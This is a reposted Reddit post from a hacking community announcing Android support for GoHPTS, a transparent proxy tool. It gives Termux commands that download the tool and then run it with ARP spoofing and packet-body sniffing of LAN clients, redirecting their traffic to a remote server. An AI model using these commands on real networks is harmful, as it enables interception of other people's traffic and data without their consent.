GoHPTS - TCP/UDP transparent proxy that allows your android device to ARP spoof & Packet sniff LAN clients
HowToHack社区为新手到资深黑客提供资源和讨论区。GoHPTS工具可将HTTP代理转换为SOCKS5代理,在支持arm64的Android设备上启用透明代理功能,并通过Discord和GitHub提供技术支持。 2025-8-30 05:21:50 Author: www.reddit.com(查看原文) 阅读量:6 收藏

r/HowToHack icon

Go to HowToHack

r/HowToHack

A banner for the subreddit

Welcome! This is your open hacker community designed to help you on the journey from neophyte to veteran in the world of underground skillsets. Ask, Answer, Learn. Visit us on discord https://discord.gg/ep2uKUG


Members Online

software

Android support

Transparent proxy can be enabled on Android devices (arm64) with root access. You can install Termux and run GoHPTS as a CLI tool there:

# you need to root your device first
pkg install tsu iproute2
# Android support added in v1.10.2
GOHPTS_RELEASE=v1.10.2; wget -v https://github.com/shadowy-pycoder/go-http-proxy-to-socks/releases/download/$GOHPTS_RELEASE/gohpts-$GOHPTS_RELEASE-android-arm64.tar.gz -O gohpts && tar xvzf gohpts && mv -f gohpts-$GOHPTS_RELEASE-android-arm64 gohpts && ./gohpts -h
# use your phone as router for LAN devices redirecting their traffic to remote socks5 server
sudo ./gohpts -s remote -t 8888 -Tu :8989 -M tproxy -sniff -body -auto -mark 100 -d -arpspoof "fullduplex true;debug false"

GoHPTS Github Page


文章来源: https://www.reddit.com/r/HowToHack/comments/1n3tg33/gohpts_tcpudp_transparent_proxy_that_allows_your/
如有侵权请联系:admin#unsafe.sh